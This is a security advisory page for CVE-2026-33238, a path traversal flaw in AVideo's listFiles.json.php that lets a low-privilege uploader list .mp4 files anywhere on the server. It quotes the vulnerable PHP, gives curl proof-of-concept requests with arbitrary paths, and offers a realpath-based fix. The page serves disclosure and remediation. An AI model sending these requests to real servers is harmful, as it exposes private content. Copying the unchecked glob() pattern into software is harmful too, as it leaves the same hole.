Skip to main content

PHP CVE-2026-33238

MEDIUM
Path Traversal (CWE-22)
2026-03-19 https://github.com/WWBN/AVideo GHSA-4wmm-6qxj-fpj4
4.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
4.3 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 19, 2026 - 12:45 vuln.today
CVE Published
Mar 19, 2026 - 12:43 nvd
MEDIUM 4.3

DescriptionGitHub Advisory

Summary

The listFiles.json.php endpoint accepts a path POST parameter and passes it directly to glob() without restricting the path to an allowed base directory. An authenticated uploader can traverse the entire server filesystem by supplying arbitrary absolute paths, enumerating .mp4 filenames and their full absolute filesystem paths wherever they exist on the server - including locations outside the web root, such as private or premium media directories.

Details

The vulnerable code is at objects/listFiles.json.php:8-45:

php
if (!User::canUpload() || !empty($advancedCustom->doNotShowImportMP4Button)) {
    return false;
}
$global['allowed'] = ['mp4'];
// ...
if (!empty($_POST['path'])) {
    $path = $_POST['path'];
    if (substr($path, -1) !== '/') {
        $path .= "/";
    }
    if (file_exists($path)) {
        $extn = implode(",*.", $global['allowed']);
        $filesStr = "{*." . $extn . ",*." . strtolower($extn) . ",*." . strtoupper($extn) . "}";
        $video_array = glob($path . $filesStr, GLOB_BRACE);
        foreach ($video_array as $key => $value) {
            $filePath = mb_convert_encoding($value, 'UTF-8');
            // ...
            $obj->path = $filePath;  // Full absolute path returned to caller

The $_POST['path'] value is used directly in glob() with no call to realpath() for normalization and no prefix check against a permitted base directory (e.g., $global['systemRootPath'] . 'videos/'). The response includes obj->path containing the full absolute filesystem path of each matched file.

The extension filter ({*.mp4,*.mp4,*.MP4}) limits results to .mp4 files, which prevents reading credentials or source code but does not prevent enumeration of video files stored in access-controlled locations such as:

  • Premium/paid content directories
  • Private or unlisted media stores
  • Backup directories containing .mp4 files
  • Paths revealing sensitive server directory structure

canUpload is a standard low-privilege role granted to any registered uploader; it does not imply administrative trust.

PoC

bash
# Step 1: Authenticate as any user with canUpload permission
# (standard uploader account)
# Step 2: Enumerate MP4 files in the web root (expected behavior)
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/var/www/html/videos/"
# Returns: [{"id":0,"path":"/var/www/html/videos/video1.mp4","name":"video1.mp4"}, ...]
# Step 3: Traverse outside intended directory to private content store
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/var/private/premium-content/"
# Returns: [{"id":0,"path":"/var/private/premium-content/paywalled-video.mp4","name":"paywalled-video.mp4"}, ...]
# Step 4: Enumerate root filesystem for any MP4 files
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/"
# Returns all .mp4 files visible to the web server process anywhere on disk

Expected behavior: Only files within the designated upload directory should be listable. Actual behavior: Files from any path readable by the web server process are returned with full absolute paths.

Impact

  • Unauthorized media enumeration: An uploader can discover private, premium, or access-controlled .mp4 files stored outside their permitted directory.
  • Filesystem structure disclosure: Full absolute paths reveal server directory layout, aiding further attacks.
  • Content bypass: In AVideo deployments where premium video files are stored in filesystem directories not protected by application access control, this exposes the filenames and paths needed to directly access them if other path traversal or direct-file-access weaknesses are present.
  • Blast radius: Requires canUpload permission (low privilege), but this is the standard permission for all video uploaders on a multi-user AVideo instance.

Recommended Fix

Restrict the supplied path to an allowed base directory using realpath():

php
if (!empty($_POST['path'])) {
    $allowedBase = realpath($global['systemRootPath'] . 'videos') . '/';
    $path = realpath($_POST['path']);

    // Reject paths that don't start with the allowed base
    if ($path === false || strpos($path . '/', $allowedBase) !== 0) {
        http_response_code(403);
        echo json_encode(['error' => 'Path not allowed']);
        exit;
    }
    $path .= '/';
    // ... continue with glob
}

realpath() resolves ../ sequences before the prefix check, preventing traversal bypasses.

AnalysisAI

The listFiles.json.php endpoint in AVideo accepts an unsanitized POST parameter path and passes it directly to PHP's glob() function without restricting traversal to an allowed base directory, enabling authenticated uploaders to enumerate .mp4 files anywhere on the server filesystem. An attacker with the standard canUpload permission can discover private, premium, or access-controlled video files stored outside the intended upload directory by supplying arbitrary absolute paths, revealing both filenames and full filesystem paths that may aid further exploitation. A proof-of-concept is available demonstrating traversal from the web root to arbitrary locations such as /var/private/premium-content/ and the root filesystem.

Technical ContextAI

The vulnerability is a classic path traversal flaw (CWE-22: Improper Limitation of a Pathname to a Restricted Directory) occurring in the objects/listFiles.json.php endpoint of WWBN AVideo (CPE: pkg:composer/wwbn_avideo). The root cause is the absence of realpath() normalization and prefix validation before passing user-supplied $_POST['path'] to the glob() function at lines 8–45. While the application attempts to filter results by extension ({*.mp4,*.mp4,*.MP4}), this extension-based constraint does not prevent directory traversal; it only limits enumerable file types to .mp4 files. The canUpload permission required for exploitation is a low-privilege role granted to all registered video uploaders, making this accessible to any non-administrative user in a multi-user AVideo deployment. The response includes the full absolute filesystem path of each matched file in the JSON response field obj->path, leaking server directory structure information.

RemediationAI

Apply the vendor patch by consulting the GitHub advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-4wmm-6qxj-fpj4 and upgrading to the patched version as soon as it is released. The recommended code fix is to validate the $_POST['path'] parameter using realpath() and a prefix check against an allowed base directory (e.g., $global['systemRootPath'] . 'videos/'), rejecting any path that does not resolve within that boundary or that resolves to false. Until patching is possible, restrict access to the /objects/listFiles.json.php endpoint via web server configuration (e.g., Apache .htaccess or nginx location block) to trusted IP ranges or disable the endpoint entirely if not actively used. Additionally, verify that filesystem permissions restrict the web server process to necessary directories only; this will not prevent the enumeration but will limit the attacker's ability to enumerate sensitive filesystem locations beyond the intended scope.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33238 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy